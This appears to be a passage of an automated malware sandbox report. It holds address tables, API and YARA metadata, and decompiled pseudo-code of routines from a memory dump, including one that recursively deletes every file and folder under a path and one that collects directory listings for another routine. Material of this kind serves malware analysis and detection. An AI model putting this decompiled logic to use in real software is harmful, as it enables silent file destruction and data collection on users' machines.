                                                                                    0x04ebcd8a
                                                                                    0x00000000
                                                                                    0x04ebcd8c
                                                                                    0x04ebcda1
                                                                                    0x04ebcda4
                                                                                    0x04ebcdac
                                                                                    0x04ebcdb6
                                                                                    0x04ebcdb6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcd6d
                                                                                    0x04ebcd6d
                                                                                    0x04ebcd6e
                                                                                    0x04ebcd6e
                                                                                    0x04ebcd78
                                                                                    0x04ebcd82
                                                                                    0x04ebcd82
                                                                                    0x04ebcc82
                                                                                    0x04ebcc82
                                                                                    0x04ebcc84
                                                                                    0x04ebcc8b
                                                                                    0x04ebcc91
                                                                                    0x04ebcc94
                                                                                    0x04ebcc9b
                                                                                    0x04ebcc9b
                                                                                    0x04ebcc9d
                                                                                    0x04ebcca1
                                                                                    0x04ebcca1
                                                                                    0x04ebcca1
                                                                                    0x04ebcca3
                                                                                    0x04ebcca3
                                                                                    0x04ebcca9
                                                                                    0x04ebccad
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebccaf
                                                                                    0x04ebccb0
                                                                                    0x04ebccb3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebccb3
                                                                                    0x04ebccb5
                                                                                    0x04ebccb8
                                                                                    0x04ebccc4
                                                                                    0x04ebccc4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebccc6
                                                                                    0x04ebccc6
                                                                                    0x04ebccc8
                                                                                    0x04ebcd0b
                                                                                    0x04ebcd20
                                                                                    0x04ebcd23
                                                                                    0x04ebcd2b
                                                                                    0x04ebcd35
                                                                                    0x04ebccca
                                                                                    0x04ebccd0
                                                                                    0x04ebccd2
                                                                                    0x04ebccd2
                                                                                    0x04ebccd5
                                                                                    0x04ebccd5
                                                                                    0x04ebccd7
                                                                                    0x04ebcce0
                                                                                    0x04ebcce0
                                                                                    0x04ebcce6
                                                                                    0x04ebccea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebccec
                                                                                    0x04ebcced
                                                                                    0x04ebccf0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebccf0
                                                                                    0x04ebccf2
                                                                                    0x04ebccf5
                                                                                    0x04ebcd01
                                                                                    0x04ebcd01
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcd03
                                                                                    0x04ebcd03
                                                                                    0x04ebcd05
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebccf7
                                                                                    0x04ebccf7
                                                                                    0x04ebccf8
                                                                                    0x04ebccf8
                                                                                    0x00000000
                                                                                    0x04ebccfc
                                                                                    0x00000000
                                                                                    0x04ebccba
                                                                                    0x04ebccba
                                                                                    0x04ebccbb
                                                                                    0x04ebccbb
                                                                                    0x00000000
                                                                                    0x04ebccbf
                                                                                    0x04ebcc7c
                                                                                    0x04ebcc77
                                                                                    0x04ebca96
                                                                                    0x04ebca96
                                                                                    0x04ebca9d
                                                                                    0x04ebcddb
                                                                                    0x00000000
                                                                                    0x04ebcaa3
                                                                                    0x04ebcaa3
                                                                                    0x04ebcaa9
                                                                                    0x04ebcaaf
                                                                                    0x04ebcbba
                                                                                    0x04ebcbbf
                                                                                    0x04ebcc0c
                                                                                    0x04ebcc12
                                                                                    0x00000000
                                                                                    0x04ebcc18
                                                                                    0x04ebcc18
                                                                                    0x04ebcc18
                                                                                    0x04ebcc1f
                                                                                    0x04ebcc22
                                                                                    0x04ebcc28
                                                                                    0x04ebcc28
                                                                                    0x04ebcc2a
                                                                                    0x04ebcc30
                                                                                    0x04ebcc30
                                                                                    0x04ebcc30
                                                                                    0x04ebcc32
                                                                                    0x04ebcc32
                                                                                    0x04ebcc38
                                                                                    0x04ebcc3c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcc3e
                                                                                    0x04ebcc3f
                                                                                    0x04ebcc42
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcc42
                                                                                    0x04ebcc44
                                                                                    0x04ebcc47
                                                                                    0x04ebcdb9
                                                                                    0x04ebcdb9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcc4d
                                                                                    0x04ebcc4d
                                                                                    0x04ebcc4e
                                                                                    0x04ebcc4e
                                                                                    0x04ebcc58
                                                                                    0x04ebcc62
                                                                                    0x04ebcc62
                                                                                    0x04ebcbc1
                                                                                    0x04ebcbc1
                                                                                    0x04ebcbc8
                                                                                    0x04ebcbcb
                                                                                    0x04ebcbd1
                                                                                    0x04ebcbd1
                                                                                    0x04ebcbd3
                                                                                    0x04ebcbd3
                                                                                    0x04ebcbd3
                                                                                    0x04ebcbd5
                                                                                    0x04ebcbd5
                                                                                    0x04ebcbdb
                                                                                    0x04ebcbdf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcbe1
                                                                                    0x04ebcbe2
                                                                                    0x04ebcbe5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcbe5
                                                                                    0x04ebcbe7
                                                                                    0x04ebcbea
                                                                                    0x04ebcc04
                                                                                    0x04ebcdbc
                                                                                    0x04ebcdbc
                                                                                    0x04ebcdbc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcbec
                                                                                    0x04ebcbec
                                                                                    0x04ebcbed
                                                                                    0x04ebcbed
                                                                                    0x04ebcbf7
                                                                                    0x04ebcc01
                                                                                    0x04ebcc01
                                                                                    0x04ebcab5
                                                                                    0x04ebcab5
                                                                                    0x04ebcabc
                                                                                    0x04ebcabf
                                                                                    0x04ebcac5
                                                                                    0x04ebcacc
                                                                                    0x04ebcad2
                                                                                    0x04ebcad9
                                                                                    0x04ebcadf
                                                                                    0x04ebcae3
                                                                                    0x04ebcaed
                                                                                    0x04ebcaf3
                                                                                    0x04ebcb04
                                                                                    0x04ebcb0a
                                                                                    0x04ebcb14
                                                                                    0x04ebcb14
                                                                                    0x04ebcb0c
                                                                                    0x04ebcb0c
                                                                                    0x04ebcb12
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb12
                                                                                    0x04ebcaf5
                                                                                    0x04ebcaf5
                                                                                    0x04ebcaf8
                                                                                    0x04ebcaf8
                                                                                    0x04ebcb20
                                                                                    0x04ebcb22
                                                                                    0x04ebcb22
                                                                                    0x04ebcb25
                                                                                    0x04ebcb28
                                                                                    0x04ebcb28
                                                                                    0x04ebcb2a
                                                                                    0x04ebcb30
                                                                                    0x04ebcb30
                                                                                    0x04ebcb36
                                                                                    0x04ebcb39
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb3b
                                                                                    0x04ebcb3c
                                                                                    0x04ebcb3f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb3f
                                                                                    0x04ebcb41
                                                                                    0x04ebcb44
                                                                                    0x04ebcb56
                                                                                    0x04ebcb56
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb58
                                                                                    0x04ebcb58
                                                                                    0x04ebcb5a
                                                                                    0x04ebcdc0
                                                                                    0x04ebcdd4
                                                                                    0x04ebcdd9
                                                                                    0x04ebcb60
                                                                                    0x04ebcb60
                                                                                    0x04ebcb66
                                                                                    0x04ebcb74
                                                                                    0x04ebcb77
                                                                                    0x04ebcb7a
                                                                                    0x04ebcb80
                                                                                    0x04ebcb80
                                                                                    0x04ebcb80
                                                                                    0x04ebcb82
                                                                                    0x04ebcb82
                                                                                    0x04ebcb88
                                                                                    0x04ebcb8c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb8e
                                                                                    0x04ebcb8f
                                                                                    0x04ebcb92
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb92
                                                                                    0x04ebcb94
                                                                                    0x04ebcb97
                                                                                    0x04ebcbab
                                                                                    0x04ebcbad
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcdbe
                                                                                    0x04ebcdbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb99
                                                                                    0x04ebcb99
                                                                                    0x04ebcb9a
                                                                                    0x04ebcb9a
                                                                                    0x04ebcb9e
                                                                                    0x04ebcba1
                                                                                    0x00000000
                                                                                    0x04ebcba1
                                                                                    0x04ebcb66
                                                                                    0x00000000
                                                                                    0x04ebcb46
                                                                                    0x04ebcb46
                                                                                    0x04ebcb47
                                                                                    0x04ebcb47
                                                                                    0x04ebcb4c
                                                                                    0x00000000
                                                                                    0x04ebcb4c
                                                                                    0x04ebcaaf
                                                                                    0x04ebca9d
                                                                                    0x04ebca90
                                                                                    0x04ebca7f
                                                                                    0x04ebca77
                                                                                    0x04ebca41
                                                                                    0x04ebca2a
                                                                                    0x04ebca0b
                                                                                    0x04ebc9fa
                                                                                    0x04ebc9d0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll,00000000), ref: 04EBC9C6
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 04EBC9F2
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000050,00003000,00000004,?,74E043E0), ref: 04EBCDCB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressAllocHandleModuleProcVirtual
                                                                                    • String ID: .$Pjj$RtlGetVersion$j$ntdll
                                                                                    • API String ID: 3695083113-758095414
                                                                                    • Opcode ID: 4397ec83f09341214a2f89542ecefb1237a0ba40f46b66240b5bd5da8565318a
                                                                                    • Instruction ID: bf5ec104e2fcca899c3cc35a8523810060c2b759b92096ca6fcd1042b7889ae6
                                                                                    • Opcode Fuzzy Hash: 4397ec83f09341214a2f89542ecefb1237a0ba40f46b66240b5bd5da8565318a
                                                                                    • Instruction Fuzzy Hash: 96C10475E481188ACB39CF58C8907FEBB60EF45318F3122AEC9D66B681D7316946CBD4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB4C20, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159filememorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 57%
                                                                                    			E04EB4C20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v12;
				short _v1056;
				intOrPtr _v1624;
				struct _WIN32_FIND_DATAW _v1648;
				char _v1649;
				long _v1656;
				void* _v1660;
				intOrPtr _v1664;
				signed int _t47;
				void* _t54;
				signed int _t56;
				signed int _t57;
				signed int _t66;
				signed int _t67;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				intOrPtr* _t87;
				void* _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				long _t104;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t109;

				_t85 = __ecx;
				_t47 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t47 ^ _t107;
				_t83 = __ecx;
				_t104 = 0x2800;
				_v1664 = __ecx;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				_v1656 = 0x2800;
				wsprintfW( &_v1056, L"%s\\*.*", _a4);
				_t109 = _t108 + 0xc;
				_t54 = FindFirstFileW( &_v1056,  &_v1648);
				_v1660 = _t54;
				if(_t54 != 0xffffffff) {
					_t84 = LocalAlloc(0x40, 0x2800);
					_t100 = 1;
					 *_t84 = 0x69;
					do {
						_t14 = _t104 - 0x410; // 0x23f0
						if(_t100 > _t14) {
							_t104 = _t104 + 0x410;
							_v1656 = _t104;
							_t84 = LocalReAlloc(_t84, _t104, 0x42);
						}
						_t87 = ".";
						_t56 =  &(_v1648.cFileName);
						while(1) {
							_t95 =  *_t56;
							if(_t95 !=  *_t87) {
								break;
							}
							if(_t95 == 0) {
								L10:
								_t57 = 0;
							} else {
								_t98 =  *((intOrPtr*)(_t56 + 2));
								_t18 = _t87 + 2; // 0x2e0000
								if(_t98 !=  *_t18) {
									break;
								} else {
									_t56 = _t56 + 4;
									_t87 = _t87 + 4;
									if(_t98 != 0) {
										continue;
									} else {
										goto L10;
									}
								}
							}
							L12:
							if(_t57 != 0) {
								_t66 = L"..";
								_t87 =  &(_v1648.cFileName);
								while(1) {
									_t96 =  *_t87;
									if(_t96 !=  *_t66) {
										break;
									}
									if(_t96 == 0) {
										L18:
										_t67 = 0;
									} else {
										_t97 =  *((intOrPtr*)(_t87 + 2));
										_t21 = _t66 + 2; // 0x2e
										if(_t97 !=  *_t21) {
											break;
										} else {
											_t87 = _t87 + 4;
											_t66 = _t66 + 4;
											if(_t97 != 0) {
												continue;
											} else {
												goto L18;
											}
										}
									}
									L20:
									if(_t67 != 0) {
										 *(_t100 + _t84) = _v1648.dwFileAttributes & 0x00000010;
										_t101 = _t100 + 1;
										_t106 = 2 + lstrlenW( &(_v1648.cFileName)) * 2;
										E04EDDC90(_t101 + _t84,  &(_v1648.cFileName), _t106);
										_t102 = _t101 + _t106;
										_t104 = _v1656;
										_t109 = _t109 + 0xc;
										 *((intOrPtr*)(_t102 + _t84)) = _v1648.nFileSizeHigh;
										 *((intOrPtr*)(_t102 + _t84 + 4)) = _v1648.nFileSizeLow;
										 *((intOrPtr*)(_t102 + _t84 + 8)) = _v1648.ftLastWriteTime;
										 *((intOrPtr*)(_t102 + _t84 + 0xc)) = _v1624;
										_t100 = _t102 + 0x10;
									}
									goto L22;
								}
								asm("sbb eax, eax");
								_t67 = _t66 | 0x00000001;
								goto L20;
							}
							goto L22;
						}
						asm("sbb eax, eax");
						_t57 = _t56 | 0x00000001;
						goto L12;
						L22:
					} while (FindNextFileW(_v1660,  &_v1648) != 0);
					_push(_t87);
					_push(0x3f);
					_push(_t100);
					E04EB1C60( *((intOrPtr*)(_v1664 + 4)));
					LocalFree(_t84);
					FindClose(_v1660);
					return E04ED572E(_v12 ^ _t107, _t84);
				} else {
					_push(_t85);
					_push(0x3f);
					_push(1);
					_v1649 = 0x69;
					E04EB1C60( *((intOrPtr*)(_t83 + 4)));
					return E04ED572E(_v12 ^ _t107,  &_v1649);
				}
			}

































                                                                                    0x04eb4c20
                                                                                    0x04eb4c29
                                                                                    0x04eb4c30
                                                                                    0x04eb4c3a
                                                                                    0x04eb4c47
                                                                                    0x04eb4c4c
                                                                                    0x04eb4c53
                                                                                    0x04eb4c5a
                                                                                    0x04eb4c60
                                                                                    0x04eb4c66
                                                                                    0x04eb4c77
                                                                                    0x04eb4c7d
                                                                                    0x04eb4c86
                                                                                    0x04eb4cc3
                                                                                    0x04eb4cc5
                                                                                    0x04eb4cca
                                                                                    0x04eb4cd0
                                                                                    0x04eb4cd0
                                                                                    0x04eb4cd8
                                                                                    0x04eb4cda
                                                                                    0x04eb4ce4
                                                                                    0x04eb4cf0
                                                                                    0x04eb4cf0
                                                                                    0x04eb4cf2
                                                                                    0x04eb4cf7
                                                                                    0x04eb4d00
                                                                                    0x04eb4d00
                                                                                    0x04eb4d06
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d0b
                                                                                    0x04eb4d22
                                                                                    0x04eb4d22
                                                                                    0x04eb4d0d
                                                                                    0x04eb4d0d
                                                                                    0x04eb4d11
                                                                                    0x04eb4d15
                                                                                    0x00000000
                                                                                    0x04eb4d17
                                                                                    0x04eb4d17
                                                                                    0x04eb4d1a
                                                                                    0x04eb4d20
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d20
                                                                                    0x04eb4d15
                                                                                    0x04eb4d2b
                                                                                    0x04eb4d2d
                                                                                    0x04eb4d33
                                                                                    0x04eb4d38
                                                                                    0x04eb4d40
                                                                                    0x04eb4d40
                                                                                    0x04eb4d46
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d4b
                                                                                    0x04eb4d62
                                                                                    0x04eb4d62
                                                                                    0x04eb4d4d
                                                                                    0x04eb4d4d
                                                                                    0x04eb4d51
                                                                                    0x04eb4d55
                                                                                    0x00000000
                                                                                    0x04eb4d57
                                                                                    0x04eb4d57
                                                                                    0x04eb4d5a
                                                                                    0x04eb4d60
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d60
                                                                                    0x04eb4d55
                                                                                    0x04eb4d6b
                                                                                    0x04eb4d6d
                                                                                    0x04eb4d77
                                                                                    0x04eb4d81
                                                                                    0x04eb4d88
                                                                                    0x04eb4d9b
                                                                                    0x04eb4da6
                                                                                    0x04eb4da8
                                                                                    0x04eb4dae
                                                                                    0x04eb4db1
                                                                                    0x04eb4dba
                                                                                    0x04eb4dc4
                                                                                    0x04eb4dce
                                                                                    0x04eb4dd2
                                                                                    0x04eb4dd2
                                                                                    0x00000000
                                                                                    0x04eb4d6d
                                                                                    0x04eb4d66
                                                                                    0x04eb4d68
                                                                                    0x00000000
                                                                                    0x04eb4d68
                                                                                    0x00000000
                                                                                    0x04eb4d2d
                                                                                    0x04eb4d26
                                                                                    0x04eb4d28
                                                                                    0x00000000
                                                                                    0x04eb4dd5
                                                                                    0x04eb4de8
                                                                                    0x04eb4df0
                                                                                    0x04eb4df7
                                                                                    0x04eb4df9
                                                                                    0x04eb4dfe
                                                                                    0x04eb4e06
                                                                                    0x04eb4e12
                                                                                    0x04eb4e2a
                                                                                    0x04eb4c88
                                                                                    0x04eb4c88
                                                                                    0x04eb4c92
                                                                                    0x04eb4c94
                                                                                    0x04eb4c97
                                                                                    0x04eb4c9e
                                                                                    0x04eb4cb3
                                                                                    0x04eb4cb3

                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 04EB4C60
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EB4C77
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EB4CBD
                                                                                    • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04EB4CEA
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4D82
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 04EB4DE2
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F), ref: 04EB4E06
                                                                                    • FindClose.KERNEL32(?), ref: 04EB4E12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                                                    • String ID: %s\*.*$i
                                                                                    • API String ID: 4084865168-1236837797
                                                                                    • Opcode ID: 55309b33a16ac2d22a2c1d77b60d4777682f520887ce076acb3ed6d104f04eb6
                                                                                    • Instruction ID: 3344b84bbc0bc3f054a320f1416c719464cc2c03bda455b9be7160d191f0a5b8
                                                                                    • Opcode Fuzzy Hash: 55309b33a16ac2d22a2c1d77b60d4777682f520887ce076acb3ed6d104f04eb6
                                                                                    • Instruction Fuzzy Hash: D6511871A00118AFD720DF64DC40BEAB7B9FF94318F4041E5E949D7245D732AA94CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB4E30, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 120fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 55%
                                                                                    			E04EB4E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
				signed int _v12;
				short _v1056;
				short _v2096;
				struct _WIN32_FIND_DATAW _v2688;
				intOrPtr _v2692;
				signed int _t26;
				signed int _t33;
				signed int _t34;
				signed int _t41;
				signed int _t42;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t59;
				void* _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				void* _t68;
				WCHAR* _t70;
				signed int _t71;
				void* _t72;
				void* _t73;

				_t26 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t26 ^ _t71;
				_t70 = _a4;
				_t68 = wsprintfW;
				_v2692 = __ecx;
				wsprintfW( &_v2096, L"%s\\*.*", _t70);
				_t73 = _t72 + 0xc;
				_t54 = FindFirstFileW( &_v2096,  &_v2688);
				if(_t54 != 0xffffffff) {
					do {
						_t56 = ".";
						_t33 =  &(_v2688.cFileName);
						while(1) {
							_t63 =  *_t33;
							if(_t63 !=  *_t56) {
								break;
							}
							if(_t63 == 0) {
								L7:
								_t34 = 0;
							} else {
								_t66 =  *((intOrPtr*)(_t33 + 2));
								_t10 = _t56 + 2; // 0x2e0000
								if(_t66 !=  *_t10) {
									break;
								} else {
									_t33 = _t33 + 4;
									_t56 = _t56 + 4;
									if(_t66 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t34 != 0) {
								_t59 = L"..";
								_t41 =  &(_v2688.cFileName);
								while(1) {
									_t64 =  *_t41;
									if(_t64 !=  *_t59) {
										break;
									}
									if(_t64 == 0) {
										L15:
										_t42 = 0;
									} else {
										_t65 =  *((intOrPtr*)(_t41 + 2));
										_t13 = _t59 + 2; // 0x2e
										if(_t65 !=  *_t13) {
											break;
										} else {
											_t41 = _t41 + 4;
											_t59 = _t59 + 4;
											if(_t65 != 0) {
												continue;
											} else {
												goto L15;
											}
										}
									}
									L17:
									if(_t42 != 0) {
										_push( &(_v2688.cFileName));
										_push(_t70);
										_push(L"%s\\%s");
										_push( &_v1056);
										if((_v2688.dwFileAttributes & 0x00000010) == 0) {
											wsprintfW();
											_t73 = _t73 + 0x10;
											DeleteFileW( &_v1056);
										} else {
											wsprintfW();
											_t73 = _t73 + 0x10;
											E04EB4E30(_t54, _v2692, _t68, _t70,  &_v1056);
										}
									}
									goto L21;
								}
								asm("sbb eax, eax");
								_t42 = _t41 | 0x00000001;
								goto L17;
							}
							goto L21;
						}
						asm("sbb eax, eax");
						_t34 = _t33 | 0x00000001;
						goto L9;
						L21:
					} while (FindNextFileW(_t54,  &_v2688) != 0);
					FindClose(_t54);
					RemoveDirectoryW(_t70);
					return E04ED572E(_v12 ^ _t71);
				} else {
					return E04ED572E(_v12 ^ _t71);
				}
			}

























                                                                                    0x04eb4e39
                                                                                    0x04eb4e40
                                                                                    0x04eb4e45
                                                                                    0x04eb4e4f
                                                                                    0x04eb4e5c
                                                                                    0x04eb4e62
                                                                                    0x04eb4e64
                                                                                    0x04eb4e7b
                                                                                    0x04eb4e80
                                                                                    0x04eb4ea0
                                                                                    0x04eb4ea0
                                                                                    0x04eb4ea5
                                                                                    0x04eb4eb0
                                                                                    0x04eb4eb0
                                                                                    0x04eb4eb6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4ebb
                                                                                    0x04eb4ed2
                                                                                    0x04eb4ed2
                                                                                    0x04eb4ebd
                                                                                    0x04eb4ebd
                                                                                    0x04eb4ec1
                                                                                    0x04eb4ec5
                                                                                    0x00000000
                                                                                    0x04eb4ec7
                                                                                    0x04eb4ec7
                                                                                    0x04eb4eca
                                                                                    0x04eb4ed0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4ed0
                                                                                    0x04eb4ec5
                                                                                    0x04eb4edb
                                                                                    0x04eb4edd
                                                                                    0x04eb4ee3
                                                                                    0x04eb4ee8
                                                                                    0x04eb4ef0
                                                                                    0x04eb4ef0
                                                                                    0x04eb4ef6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4efb
                                                                                    0x04eb4f12
                                                                                    0x04eb4f12
                                                                                    0x04eb4efd
                                                                                    0x04eb4efd
                                                                                    0x04eb4f01
                                                                                    0x04eb4f05
                                                                                    0x00000000
                                                                                    0x04eb4f07
                                                                                    0x04eb4f07
                                                                                    0x04eb4f0a
                                                                                    0x04eb4f10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4f10
                                                                                    0x04eb4f05
                                                                                    0x04eb4f1b
                                                                                    0x04eb4f1d
                                                                                    0x04eb4f2c
                                                                                    0x04eb4f2d
                                                                                    0x04eb4f34
                                                                                    0x04eb4f39
                                                                                    0x04eb4f3a
                                                                                    0x04eb4f55
                                                                                    0x04eb4f57
                                                                                    0x04eb4f61
                                                                                    0x04eb4f3c
                                                                                    0x04eb4f3c
                                                                                    0x04eb4f4a
                                                                                    0x04eb4f4e
                                                                                    0x04eb4f4e
                                                                                    0x04eb4f3a
                                                                                    0x00000000
                                                                                    0x04eb4f1d
                                                                                    0x04eb4f16
                                                                                    0x04eb4f18
                                                                                    0x00000000
                                                                                    0x04eb4f18
                                                                                    0x00000000
                                                                                    0x04eb4edd
                                                                                    0x04eb4ed6
                                                                                    0x04eb4ed8
                                                                                    0x00000000
                                                                                    0x04eb4f67
                                                                                    0x04eb4f75
                                                                                    0x04eb4f7e
                                                                                    0x04eb4f85
                                                                                    0x04eb4fa0
                                                                                    0x04eb4e82
                                                                                    0x04eb4e94
                                                                                    0x04eb4e94

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                                                    • String ID: %s\%s$%s\*.*
                                                                                    • API String ID: 2470771279-1665845743
                                                                                    • Opcode ID: 6c2ca7c667a9b43576e10c3a6ab71cfca60179c407284e23a8eb153d7927641a
                                                                                    • Instruction ID: ee10f37f5f31d8e19ebdd6e9b14a264cb5cd1408b12e15d3bc4747289a494dc3
                                                                                    • Opcode Fuzzy Hash: 6c2ca7c667a9b43576e10c3a6ab71cfca60179c407284e23a8eb153d7927641a
                                                                                    • Instruction Fuzzy Hash: DC41D8716001189ADB10EF74DD41AFBB3ADFF55318F40A4A5D945D7185EB32FA44CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC4560, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 154stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 79%
                                                                                    			E04EC4560(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				short _v16;
				char _v536;
				WCHAR* _v540;
				WCHAR* _v544;
				signed int _t35;
				char* _t41;
				WCHAR* _t46;
				short _t49;
				short _t50;
				WCHAR* _t51;
				long _t53;
				signed int _t56;
				signed int _t63;
				long _t64;
				WCHAR* _t68;
				long _t70;
				WCHAR* _t74;
				signed int _t76;
				void* _t98;
				WCHAR* _t101;
				void* _t104;
				long _t105;
				WCHAR* _t106;
				signed int _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				long _t115;

				_t98 = __edi;
				_t35 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t35 ^ _t107;
				_t104 = __ecx;
				_v540 = __edx;
				E04EDDAD0(__edi, __edx, 0, 0x208);
				E04EDDAD0(_t98,  &_v536, 0, 0x208);
				_t109 = _t108 + 0x18;
				_t41 =  &_v536;
				__imp__GetProcessImageFileNameW(_t104, _t41, 0x104);
				if(_t41 == 0) {
					L16:
					__eflags = _v8 ^ _t107;
					return E04ED572E(_v8 ^ _t107);
				} else {
					_push(_t98);
					_t105 = GetLogicalDriveStringsW(0, 0);
					_t115 = _t105;
					if(_t115 == 0) {
						L15:
						goto L16;
					} else {
						_t5 = _t105 + 1; // 0x1
						_push(__ebx);
						_push( ~(_t115 > 0) | _t5 * 0x00000002);
						_t46 = E04ED5785( ~(_t115 > 0) | _t5 * 0x00000002, _t105, _t115);
						_t86 = 2 + _t105 * 2;
						_t74 = _t46;
						_v544 = _t74;
						E04EDDAD0(GetLogicalDriveStringsW, _t74, 0, 2 + _t105 * 2);
						_t110 = _t109 + 0x10;
						if(GetLogicalDriveStringsW(_t105, _t74) != 0) {
							_t49 =  *0x4efddb0; // 0x3a0020
							_v16 = _t49;
							_t50 =  *0x4efddb4; // 0x0
							_push(0x208);
							_v12 = _t50;
							_t51 = E04ED5785(_t86, _t105, __eflags);
							_t111 = _t110 + 4;
							_t101 = _t51;
							_t106 = _t74;
							while(1) {
								_t87 =  *_t106;
								_v16 =  *_t106;
								_t53 = QueryDosDeviceW( &_v16, _t101, 0x104);
								__eflags = _t53;
								if(_t53 != 0) {
									goto L8;
								}
								_t64 = GetLastError();
								__eflags = _t64 - 0x7a;
								if(_t64 == 0x7a) {
									E04ED573F(_t101);
									_t87 =  ~(__eflags > 0) | 2;
									_push( ~(__eflags > 0) | 2);
									_t68 = E04ED5785( ~(__eflags > 0) | 2, _t106, __eflags);
									_t111 = _t111 + 8;
									_t101 = _t68;
									_t70 = QueryDosDeviceW( &_v16, _t101, 1);
									__eflags = _t70;
									if(_t70 != 0) {
										goto L8;
									}
								}
								L14:
								E04ED573F(_v544);
								E04ED573F(_t101);
								goto L15;
								L8:
								_t76 = lstrlenW(_t101);
								_t56 = E04EDF1BA(_t76, _t87, _t106,  &_v536, _t101, _t76);
